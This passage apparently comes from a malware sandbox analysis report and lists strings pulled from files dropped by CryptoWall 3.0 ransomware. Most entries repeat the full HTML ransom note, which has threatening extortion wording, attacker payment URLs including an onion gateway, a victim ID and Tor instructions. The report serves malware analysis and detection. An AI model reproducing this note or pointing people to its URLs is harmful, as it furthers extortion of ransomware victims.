target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html245.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html230.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html189.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html158.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html324.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html334.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html407.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html217.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html357.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html119.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt196.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt54.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html18.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html164.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt289.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt285.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt118.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
